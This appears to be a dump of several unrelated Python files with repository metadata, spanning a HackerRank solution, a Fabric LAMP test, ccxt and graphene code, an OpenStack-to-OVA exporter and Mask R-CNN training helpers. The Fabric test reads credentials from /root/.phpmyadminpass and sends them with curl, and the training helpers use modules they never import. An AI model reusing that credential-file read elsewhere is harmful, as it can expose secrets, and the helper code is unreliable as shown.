        for bit in bits:
            node = node.setdefault(bit, {})
    return trie
def maxXor(arr, queries):
    """For each query q, return max(q ^ a for a in arr).

    Builds a fixed-depth binary trie of the array values (every value
    padded to the bit-width of the overall maximum), then greedily walks
    it per query, preferring the opposite bit at each level.
    """
    biggest = max(arr + queries)
    width = len(bin(biggest)[2:])
    flip = {'0': '1', '1': '0'}
    # Trie of all array values, each path exactly `width` bits deep.
    root = {}
    for value in arr:
        node = root
        for bit in bin(value)[2:].zfill(width):
            node = node.setdefault(bit, {})
    answers = []
    for query in queries:
        node = root
        xor_bits = []
        for bit in bin(query)[2:].zfill(width):
            wanted = flip[bit]
            if wanted in node:
                # Opposite bit available: this position contributes a 1.
                xor_bits.append('1')
                node = node[wanted]
            elif bit in node:
                xor_bits.append('0')
                node = node[bit]
        answers.append(int(''.join(xor_bits), 2))
    return answers
if __name__ == '__main__':
    # HackerRank harness: read the array and queries from stdin and write
    # one maximum-XOR result per query to the OUTPUT_PATH file.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())  # declared array size; not referenced after parsing
    arr = list(map(int, input().rstrip().split()))
    m = int(input())  # number of queries, one per following line
    queries = []
    for _ in range(m):
        queries_item = int(input())
        queries.append(queries_item)
    result = maxXor(arr, queries)
    fptr.write('\n'.join(map(str, result)))
    fptr.write('\n')
    fptr.close()
| 26.5 | 75 | 0.586286 |
acfa71b0cb4246f7c7fb1a3220bf7670f7056dcb | 2,437 | py | Python | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 2 | 2017-02-17T20:35:09.000Z | 2019-02-06T04:50:38.000Z | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 1 | 2017-03-15T19:53:15.000Z | 2017-03-15T19:53:15.000Z | test/fabric/lamp.py | dannylujan/lamp | 785ae9777102f72fb0027216483e21fdf81f524e | [
"Apache-2.0"
] | 6 | 2017-01-19T18:33:19.000Z | 2019-10-07T12:34:05.000Z | from fabric.api import env, hide, run, task
from envassert import detect, file, package, port, process, service
from hot.utils.test import get_artifacts
def phpmyadmin_is_responding():
    """Hit /phpmyadmin using the credentials cached on the host.

    fabric's run() aborts the task when the command fails, so reaching the
    final return means the curl request completed.
    """
    assert file.exists('/root/.phpmyadminpass'), "/root/.phpmyadminpass not found"
    with hide('running', 'stdout'):
        credentials = run("cat /root/.phpmyadminpass")
    htuser, htpass = credentials.split(' ')[0], credentials.split(' ')[1]
    with hide('running', 'stdout'):
        run("curl -IL http://localhost/phpmyadmin -u '{0}:{1}'".format(htuser, htpass))
    return True
def holland_is_running():
    """Trigger a holland backup run; run() aborts the task on failure."""
    with hide('running', 'stdout'):
        run("holland bk")
    return True
def apache_is_responding():
    """Fetch the local homepage; run() aborts the task if wget fails."""
    with hide('running', 'stdout'):
        run("wget --quiet --output-document - http://localhost/")
    return True
@task
def check():
env.platform_family = detect.detect()
if env.platform_family == "rhel":
assert package.installed("httpd"), "httpd not installed"
assert package.installed("holland"), "holland is not installed"
assert package.installed("mysql55"), "mysql55 is not insalled"
assert process.is_up("httpd"), "process httpd not running"
assert service.is_enabled("httpd"), "httpd not enabled"
# welcome.conf causes a 403 when running apache_is_responding()
# with the stock build.
if env.platform_family == "debian":
print "Ubuntu 12.04/14.04 or Debian 7.x/8.x"
assert package.installed("apache2"), "apache2 is not installed"
assert package.installed("mysql-server-5.5"), ("mysql-server-5.5 not" +
" installed")
assert process.is_up("apache2"), "apache2 is not running"
assert service.is_enabled("apache2"), "apache2 is not enabled"
assert apache_is_responding(), "apache2 is not responding"
assert port.is_listening(80), "port 80 not listening"
assert port.is_listening(443), "port 443 not listening"
assert port.is_listening(3306), "port 3306 not listening"
assert phpmyadmin_is_responding(), "phpmyadmin is not responding"
assert holland_is_running(), "holland cannot run"
@task
def artifacts():
    """Fabric task: detect the platform family and collect test artifacts."""
    env.platform_family = detect.detect()
    get_artifacts()
| 37.492308 | 79 | 0.631924 |
acfa7240b8f1a5303075768b5086a1790632df29 | 3,440 | py | Python | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | 1 | 2018-07-06T08:14:13.000Z | 2018-07-06T08:14:13.000Z | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | null | null | null | python/ccxt/async/hadax.py | MoreChickenDelivered/ccxt | a8996798d08a1cedc30bfb3db72d14bc8919930f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.async.huobipro import huobipro
from ccxt.base.errors import PermissionDenied
class hadax (huobipro):
    def describe(self):
        # HADAX shares the Huobi Pro implementation; only identity, URLs,
        # endpoint paths and a few options differ from the parent describe().
        return self.deep_extend(super(hadax, self).describe(), {
            'id': 'hadax',
            'name': 'HADAX',
            'countries': ['CN'],
            'hostname': 'api.hadax.com',
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/38059952-4756c49e-32f1-11e8-90b9-45c1eccba9cd.jpg',
                'api': 'https://api.hadax.com',
                'www': 'https://www.hadax.com',
                'doc': 'https://github.com/huobiapi/API_Docs/wiki',
            },
            'has': {
                'fetchCurrencies': False,
            },
            'api': {
                'public': {
                    'get': [
                        'hadax/common/symbols',  # query all trading pairs supported by the system
                        'hadax/common/currencys',  # query all currencies supported by the system
                        'common/timestamp',  # query the current system time
                        'hadax/settings/currencys',  # ?language=en-US
                    ],
                },
                'private': {
                    'get': [
                        'account/accounts',  # query all accounts of the current user (i.e. account-id)
                        'hadax/account/accounts/{id}/balance',  # query the balance of the specified account
                        'order/orders/{id}',  # query details of an order
                        'order/orders/{id}/matchresults',  # query trade details of an order
                        'order/orders',  # query open orders / order history
                        'order/matchresults',  # query current trades / trade history
                        'dw/withdraw-virtual/addresses',  # query cryptocurrency withdrawal addresses
                        'dw/deposit-virtual/addresses',
                        'query/deposit-withdraw',
                        'margin/loan-orders',  # margin loan orders
                        'margin/accounts/balance',  # margin account details
                    ],
                    'post': [
                        'hadax/order/orders/place',  # create and execute a new order (one-step placement, recommended)
                        'order/orders',  # create a new order request (create only, do not execute)
                        'order/orders/{id}/place',  # execute an order (a previously created one)
                        'order/orders/{id}/submitcancel',  # submit a request to cancel an order
                        'order/orders/batchcancel',  # cancel orders in batch
                        'dw/balance/transfer',  # asset transfer
                        'dw/withdraw/api/create',  # request a cryptocurrency withdrawal
                        'dw/withdraw-virtual/create',  # request a cryptocurrency withdrawal
                        'dw/withdraw-virtual/{id}/place',  # confirm a cryptocurrency withdrawal request
                        'dw/withdraw-virtual/{id}/cancel',  # cancel a cryptocurrency withdrawal request
                        'dw/transfer-in/margin',  # transfer from the spot account into the margin account
                        'dw/transfer-out/margin',  # transfer from the margin account out to the spot account
                        'margin/orders',  # request a margin loan
                        'margin/orders/{id}/repay',  # repay a margin loan
                    ],
                },
            },
            'exceptions': {
                'not-allow-entry-hadax': PermissionDenied,
            },
            'options': {
                'fetchMarketsMethod': 'publicGetHadaxCommonSymbols',
                'fetchBalanceMethod': 'privateGetHadaxAccountAccountsIdBalance',
                'createOrderMethod': 'privatePostHadaxOrderOrdersPlace',
            },
        })
| 44.675325 | 126 | 0.459012 |
acfa72ff94a3ffc0b24ca577a7f3c0f00d8e1487 | 112 | py | Python | nomadgram2/notifications/apps.py | choiyeonseok/Instagram-cloning | 38dac1d0c717136eaf350ff908b248fb06b8b3dd | [
"MIT"
] | 1 | 2020-07-27T19:56:24.000Z | 2020-07-27T19:56:24.000Z | nomadgram2/notifications/apps.py | choiyeonseok/Instagram-cloning | 38dac1d0c717136eaf350ff908b248fb06b8b3dd | [
"MIT"
] | 28 | 2019-07-03T20:44:58.000Z | 2022-03-15T19:35:20.000Z | nomadgram2/notifications/apps.py | vanadis0929/nomadgram2 | 4a6aa88848bec25ee41a5afa9be4d7f6af515dc4 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class NotificationsConfig(AppConfig):
    """Django AppConfig for the nomadgram2 notifications app."""
    name = 'nomadgram2.notifications'
| 18.666667 | 37 | 0.794643 |
acfa73258ff062170fb75d1b9111e44f8a07c0bd | 1,450 | py | Python | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | suspect/monotonicity/rules/abs.py | michaelbynum/suspect | efbfbc4a004d8e167fd4a7247b465b6569818433 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Francesco Ceccon
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Monotonicity detection rules for abs function."""
from suspect.monotonicity.monotonicity import Monotonicity
from suspect.monotonicity.rules.rule import MonotonicityRule
from suspect.expression import UnaryFunctionType
class AbsRule(MonotonicityRule):
    """Monotonicity of abs(child)."""

    def apply(self, expr, monotonicity, bounds):
        arg = expr.args[0]
        arg_mono = monotonicity[arg]
        arg_bounds = bounds[arg]
        # A constant stays constant under abs.
        if arg_mono.is_constant():
            return arg_mono
        # On a sign-definite domain abs is either the identity (x >= 0) or
        # the reflection (x <= 0); abs(-x) and abs(1/x) are good examples.
        if arg_bounds.is_nonnegative():
            return arg_mono
        if arg_bounds.is_nonpositive():
            return arg_mono.negate()
        # The sign may change inside the interval: nothing can be concluded.
        return Monotonicity.Unknown
| 36.25 | 74 | 0.696552 |
acfa744b5abbd306ffec83e866f533d50e1e8d81 | 3,562 | py | Python | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 947 | 2016-09-18T03:31:41.000Z | 2022-03-28T11:02:29.000Z | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 328 | 2016-09-19T13:37:39.000Z | 2022-03-31T20:06:03.000Z | graphene_sqlalchemy/registry.py | oneome-llc/graphene-sqlalchemy | 57cd7866848d5a6ad174710be2a09c1339c159e8 | [
"MIT"
] | 261 | 2016-09-18T10:31:11.000Z | 2022-03-10T18:03:21.000Z | from collections import defaultdict
from sqlalchemy.types import Enum as SQLAlchemyEnumType
from graphene import Enum
class Registry(object):
    """Bookkeeping between SQLAlchemy constructs and their Graphene types.

    A single registry is shared by all types generated against it so that
    cross-references (models, ORM fields, composites, enums, sort enums)
    resolve to the same Graphene objects.
    """

    def __init__(self):
        # model class -> SQLAlchemyObjectType (see register()).
        self._registry = {}
        # Not written by any method in this class; kept for compatibility.
        self._registry_models = {}
        # obj_type -> {graphene field name -> ORM field}.
        self._registry_orm_fields = defaultdict(dict)
        # SQLAlchemy composite -> converter callable.
        self._registry_composites = {}
        # SQLAlchemy Enum column type -> Graphene Enum.
        self._registry_enums = {}
        # obj_type -> Graphene Enum used for its sort argument.
        self._registry_sort_enums = {}

    @staticmethod
    def _check_object_type(obj_type):
        """Raise TypeError unless obj_type is a SQLAlchemyObjectType subclass.

        Shared by register(), register_orm_field() and register_sort_enum(),
        which previously duplicated this check verbatim.
        """
        from .types import SQLAlchemyObjectType

        if not isinstance(obj_type, type) or not issubclass(
            obj_type, SQLAlchemyObjectType
        ):
            raise TypeError(
                "Expected SQLAlchemyObjectType, but got: {!r}".format(obj_type)
            )

    def register(self, obj_type):
        """Associate obj_type with its SQLAlchemy model."""
        self._check_object_type(obj_type)
        assert obj_type._meta.registry == self, "Registry for a Model have to match."
        self._registry[obj_type._meta.model] = obj_type

    def get_type_for_model(self, model):
        """Return the object type registered for model, or None."""
        return self._registry.get(model)

    def register_orm_field(self, obj_type, field_name, orm_field):
        """Record which ORM field backs obj_type's graphene field field_name."""
        self._check_object_type(obj_type)
        if not field_name or not isinstance(field_name, str):
            raise TypeError("Expected a field name, but got: {!r}".format(field_name))
        self._registry_orm_fields[obj_type][field_name] = orm_field

    def get_orm_field_for_graphene_field(self, obj_type, field_name):
        """Return the ORM field backing obj_type.field_name, or None."""
        return self._registry_orm_fields.get(obj_type, {}).get(field_name)

    def register_composite_converter(self, composite, converter):
        """Associate a SQLAlchemy composite with its converter callable."""
        self._registry_composites[composite] = converter

    def get_converter_for_composite(self, composite):
        """Return the converter registered for composite, or None."""
        return self._registry_composites.get(composite)

    def register_enum(self, sa_enum, graphene_enum):
        """Associate a SQLAlchemy Enum column type with a Graphene Enum."""
        if not isinstance(sa_enum, SQLAlchemyEnumType):
            raise TypeError(
                "Expected SQLAlchemyEnumType, but got: {!r}".format(sa_enum)
            )
        if not isinstance(graphene_enum, type(Enum)):
            raise TypeError(
                "Expected Graphene Enum, but got: {!r}".format(graphene_enum)
            )
        self._registry_enums[sa_enum] = graphene_enum

    def get_graphene_enum_for_sa_enum(self, sa_enum):
        """Return the Graphene Enum registered for sa_enum, or None."""
        return self._registry_enums.get(sa_enum)

    def register_sort_enum(self, obj_type, sort_enum):
        """Associate obj_type with the Enum used for its sort argument."""
        self._check_object_type(obj_type)
        if not isinstance(sort_enum, type(Enum)):
            raise TypeError("Expected Graphene Enum, but got: {!r}".format(sort_enum))
        self._registry_sort_enums[obj_type] = sort_enum

    def get_sort_enum_for_object_type(self, obj_type):
        """Return the sort Enum registered for obj_type, or None."""
        return self._registry_sort_enums.get(obj_type)
# Process-wide registry used by types that do not supply their own.
registry = None


def get_global_registry():
    """Return the shared Registry, creating it on first access."""
    global registry
    registry = registry or Registry()
    return registry


def reset_global_registry():
    """Discard the shared Registry so the next access builds a fresh one."""
    global registry
    registry = None
| 34.582524 | 86 | 0.657496 |
acfa74746483ce0eb678f78f16fc02dabfd7ca6d | 7,624 | py | Python | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | 9 | 2021-12-19T13:47:10.000Z | 2022-03-26T06:34:02.000Z | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | null | null | null | out/production/mitmproxynew/clients/python/BrowserUpProxyClient/model/entry_request_cookies.py | 580/mitmproxy | 4cd9ca187918c99db1022b062e57d14ca5153f8b | [
"MIT"
] | 3 | 2021-12-20T08:21:47.000Z | 2022-03-29T17:55:12.000Z | """
BrowserUp Proxy
___ This is the REST API for controlling the BrowserUp Proxy. The BrowserUp Proxy is a swiss army knife for automated testing that captures HTTP traffic in HAR files. It is also useful for Selenium/Cypress tests. ___ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from BrowserUpProxyClient.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class EntryRequestCookies(ModelNormal):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    Attributes:
      allowed_values (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          with a capitalized key describing the allowed value and an allowed
          value. These dicts store the allowed enum values.
      attribute_map (dict): The key is attribute name
          and the value is json key in definition.
      discriminator_value_class_map (dict): A dict to go from the discriminator
          variable value to the discriminator class name.
      validations (dict): The key is the tuple path to the attribute
          and the for var_name this is (var_name,). The value is a dict
          that stores validations for max_length, min_length, max_items,
          min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
          inclusive_minimum, and regex.
      additional_properties_type (tuple): A tuple of classes accepted
          as additional properties values.
    """
    # This model declares no enum-valued attributes.
    allowed_values = {
    }
    # No extra constraints (lengths, ranges, regex) beyond type checks.
    validations = {
    }
    additional_properties_type = None
    _nullable = False
    @cached_property
    def openapi_types():
        """
        This must be a method because a model may have properties that are
        of type self, this must run after the class is loaded
        Returns
            openapi_types (dict): The key is attribute name
                and the value is attribute type.
        """
        # Every cookie attribute is a primitive (str/bool); no nested models.
        return {
            'name': (str,),  # noqa: E501
            'value': (str,),  # noqa: E501
            'path': (str,),  # noqa: E501
            'domain': (str,),  # noqa: E501
            'expires': (str,),  # noqa: E501
            'http_only': (bool,),  # noqa: E501
            'secure': (bool,),  # noqa: E501
            'comment': (str,),  # noqa: E501
        }
    @cached_property
    def discriminator():
        # None: this schema takes part in no polymorphic composition.
        return None
    # Python attribute name -> JSON key (camelCase where they differ).
    attribute_map = {
        'name': 'name',  # noqa: E501
        'value': 'value',  # noqa: E501
        'path': 'path',  # noqa: E501
        'domain': 'domain',  # noqa: E501
        'expires': 'expires',  # noqa: E501
        'http_only': 'httpOnly',  # noqa: E501
        'secure': 'secure',  # noqa: E501
        'comment': 'comment',  # noqa: E501
    }
    _composed_schemas = {}
    # Internal bookkeeping attributes, never treated as model data.
    required_properties = set([
        '_data_store',
        '_check_type',
        '_spec_property_naming',
        '_path_to_item',
        '_configuration',
        '_visited_composed_classes',
    ])
    @convert_js_args_to_python_args
    def __init__(self, name, value, *args, **kwargs):  # noqa: E501
        """EntryRequestCookies - a model defined in OpenAPI
        Args:
            name (str):
            value (str):
        Keyword Args:
            _check_type (bool): if True, values for parameters in openapi_types
                will be type checked and a TypeError will be
                raised if the wrong type is input.
                Defaults to True
            _path_to_item (tuple/list): This is a list of keys or values to
                drill down to the model in received_data
                when deserializing a response
            _spec_property_naming (bool): True if the variable names in the input data
                are serialized names, as specified in the OpenAPI document.
                False if the variable names in the input data
                are pythonic names, e.g. snake case (default)
            _configuration (Configuration): the instance to use when
                deserializing a file_type parameter.
                If passed, type conversion is attempted
                If omitted no type conversion is done.
            _visited_composed_classes (tuple): This stores a tuple of
                classes that we have traveled through so that
                if we see that class again we will not use its
                discriminator again.
                When traveling through a discriminator, the
                composed schema that is
                is traveled through is added to this set.
                For example if Animal has a discriminator
                petType and we pass in "Dog", and the class Dog
                allOf includes Animal, we move through Animal
                once using the discriminator, and pick Dog.
                Then in Dog, we will make an instance of the
                Animal class but this time we won't travel
                through its discriminator because we passed in
                _visited_composed_classes = (Animal,)
            path (str): [optional] # noqa: E501
            domain (str): [optional] # noqa: E501
            expires (str): [optional] # noqa: E501
            http_only (bool): [optional] # noqa: E501
            secure (bool): [optional] # noqa: E501
            comment (str): [optional] # noqa: E501
        """
        # Pop framework-control kwargs before treating the rest as attributes.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        # Only 'name' and 'value' may be positional; anything more is an error.
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.name = name
        self.value = value
        for var_name, var_value in kwargs.items():
            if var_name not in self.attribute_map and \
                    self._configuration is not None and \
                    self._configuration.discard_unknown_keys and \
                    self.additional_properties_type is None:
                # discard variable.
                continue
            setattr(self, var_name, var_value)
| 39.708333 | 236 | 0.569911 |
acfa752f74ed81faaa821ca091fd0034b0fa5962 | 4,458 | py | Python | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 8 | 2016-09-06T17:47:24.000Z | 2021-03-09T15:07:23.000Z | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 1 | 2020-04-16T01:11:25.000Z | 2020-04-16T01:11:25.000Z | app/modules/generate.py | icclab/openstack-ova-onboarding | 443a789875acc012616bf53eeca2ce01db8ad85d | [
"Apache-2.0"
] | 3 | 2017-07-20T11:26:56.000Z | 2019-05-05T11:25:41.000Z | import uuid
import tarfile
import subprocess
from app.modules.openstack.glance import GlanceClient
from app.modules.openstack.nova import NovaClient
from app.modules.xml_file.generate.generation import OVAFile
from flask import Blueprint, request
from openstack.session import get_valid_session
from backend_logging import LOG
import time
import sys
import os
# Flask blueprint under which the /api/generate endpoint is registered.
mod = Blueprint('generating', __name__)
from app import app  # NOTE(review): mid-file import, presumably to dodge a circular import with app — confirm
temp_location = app.config['UPLOAD_FOLDER']  # scratch dir for downloaded/converted image files
def make_tarfile(source_dir, order):
    """Pack the files listed in *order* (kept in that order) from
    *source_dir* into an uncompressed <source_dir>.ova tar archive,
    deleting each source file right after it is added.
    """
    archive_path = source_dir + ".ova"
    with tarfile.open(archive_path, "w") as archive:
        for member in order:
            member_path = os.path.join(source_dir, member)
            archive.add(member_path, arcname=os.path.basename(member_path))
            os.remove(member_path)
@mod.route('/api/generate', methods=['POST'])
def generate():
openstack = request.form
region = openstack['region']
session = get_valid_session(openstack)
nova = NovaClient(session=session.session, version=2, region=region)
glance = GlanceClient(session=session.session, version=2, region=region)
if nova.get_status() and glance.get_status():
LOG.info("Connection to all services are established")
ovf_version = "2.0"
my_file = OVAFile(ovf_version)
my_file.base_setUP()
output_folder = str(uuid.uuid4())
os.mkdir(temp_location + output_folder)
ova_path = temp_location + output_folder
def wait_until_image(image_id, period=0.25):
while glance.get_image(image_id)["status"] != "active":
time.sleep(period)
return True
def save_image(image_id, path):
"""Save an image to the specified path.
:param image_id: image id
:param path: path to save the image to
"""
wait_until_image(image_id)
LOG.info("Image is saved as snapshot")
data = glance.get_image_data(image_id)
if path is None:
image = getattr(sys.stdout, 'buffer',
sys.stdout)
else:
image = open(path, 'wb')
try:
for chunk in data:
image.write(chunk)
finally:
if path is not None:
image.close()
number = 1
order_list = ['ova']
for instance_id in (dict(openstack))['instance_id']:
nova_instance = nova.get_instance_by_id(instance_id)
unique_ind = str(uuid.uuid4())
name = nova_instance.name + unique_ind
flavor = nova.get_flavor(id=nova_instance.flavor['id'])
file_reference = "file" + str(number)
image_name = name + '.vmdk'
machine_name = nova_instance.name
disk_capacity = str(flavor.disk*1024*1024*1024)
diskId = "vmdisk" + str(number)
box_id = str(uuid.uuid4())
box_uuid = "{2f07cea2-4c31-44fa-8e96-31aada3ccaa3}"
os_type = "RedHat_64"
version = "1.12-linux"
cpu_number = str(flavor.vcpus)
memory_size = str(flavor.ram)
qcow_path = temp_location + name + '.qcow2'
rules = nova.get_security_rules(nova_instance)
if len(app.config['PORT_RANGE']) < len(rules):
raise Exception("Not enough ports available for security groups are available")
my_file.add_machine(image_name, file_reference, disk_capacity, diskId, box_id,
machine_name, os_type, cpu_number, memory_size, version,
box_uuid, nova_instance.networks, rules)
image_id = nova.create_image_from_instance(instance_id, nova_instance.name)
save_image(image_id, qcow_path)
glance.remove_image(image_id)
subprocess.call(['qemu-img', 'convert', '-f', 'qcow2', '-O', 'vmdk', '-o', 'subformat=streamOptimized',
qcow_path, ova_path + "/" + name + '.vmdk'])
os.remove(qcow_path)
LOG.info("Image is downloaded as " + name + ".qcow2")
order_list.append(name + ".vmdk")
number += 1
my_file.get_xml_file(ova_path + "/" + output_folder + '.ovf')
order_list[0] = output_folder + '.ovf'
make_tarfile(ova_path, order_list)
LOG.info("File is saved as " + output_folder + " file")
os.rmdir(ova_path)
return str({"Ok"})
| 39.803571 | 115 | 0.598923 |
acfa75f1d02a08f6abb226806abc2bdf6034d5ad | 90 | py | Python | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | github_activity/__init__.py | consideRatio/github-activity | 29e04df5fb473c4761cba500dbbc81e263c69df9 | [
"BSD-3-Clause"
] | null | null | null | __version__ = "0.1.0dev0"
from .github_activity import get_activity, generate_activity_md | 30 | 63 | 0.833333 |
acfa7752ccd4129363d18ee649b2652f1e6ada9d | 4,742 | py | Python | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | models/models.py | alejgo06/image_detector_backend | 03de0815db8fef79075f1baf64395c67725f0d02 | [
"MIT"
] | null | null | null | import torchvision
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection.mask_rcnn import MaskRCNNPredictor
import math
import sys
import torch
from coco_utils import get_coco_api_from_dataset
from coco_eval import CocoEvaluator
def get_instance_segmentation_model(num_classes):
# load an instance segmentation model pre-trained on COCO
model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)
# get the number of input features for the classifier
in_features = model.roi_heads.box_predictor.cls_score.in_features
# replace the pre-trained head with a new one
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
# now get the number of input features for the mask classifier
in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels
hidden_layer = 256
# and replace the mask predictor with a new one
model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,
hidden_layer,
num_classes)
return model
def train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq):
model.train()
metric_logger = utils.MetricLogger(delimiter=" ")
metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
header = 'Epoch: [{}]'.format(epoch)
lr_scheduler = None
if epoch == 0:
warmup_factor = 1. / 1000
warmup_iters = min(1000, len(data_loader) - 1)
lr_scheduler = utils.warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)
for images, targets in metric_logger.log_every(data_loader, print_freq, header):
images = list(image.to(device) for image in images)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
loss_dict = model(images, targets)
losses = sum(loss for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = utils.reduce_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
loss_value = losses_reduced.item()
if not math.isfinite(loss_value):
print("Loss is {}, stopping training".format(loss_value))
print(loss_dict_reduced)
sys.exit(1)
optimizer.zero_grad()
losses.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step()
metric_logger.update(loss=losses_reduced, **loss_dict_reduced)
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
return metric_logger
def evaluate(model, data_loader, device):
n_threads = torch.get_num_threads()
# FIXME remove this and make paste_masks_in_image run on the GPU
torch.set_num_threads(1)
cpu_device = torch.device("cpu")
model.eval()
metric_logger = utils.MetricLogger(delimiter=" ")
header = 'Test:'
coco = get_coco_api_from_dataset(data_loader.dataset)
iou_types = _get_iou_types(model)
coco_evaluator = CocoEvaluator(coco, iou_types)
for image, targets in metric_logger.log_every(data_loader, 100, header):
image = list(img.to(device) for img in image)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
torch.cuda.synchronize()
model_time = time.time()
outputs = model(image)
outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
res = {target["image_id"].item(): output for target, output in zip(targets, outputs)}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
torch.set_num_threads(n_threads)
return coco_evaluator
def _get_iou_types(model):
model_without_ddp = model
if isinstance(model, torch.nn.parallel.DistributedDataParallel):
model_without_ddp = model.module
iou_types = ["bbox"]
if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):
iou_types.append("segm")
if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):
iou_types.append("keypoints")
return iou_types | 37.046875 | 93 | 0.697385 |
acfa78862bc3cc4f93ad76ba1be5b9e8babafa7e | 668 | py | Python | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 5 | 2022-02-19T09:44:32.000Z | 2022-03-19T14:56:57.000Z | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 4 | 2021-12-10T22:40:33.000Z | 2021-12-20T18:08:07.000Z | listen360/manage.py | zkan/listen360 | effaa7491cfc858cc4c944b6a4557bd284167cc3 | [
"MIT"
] | 2 | 2021-11-13T16:00:13.000Z | 2021-11-14T15:39:32.000Z | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
try:
from django.core.management import execute_from_command_line
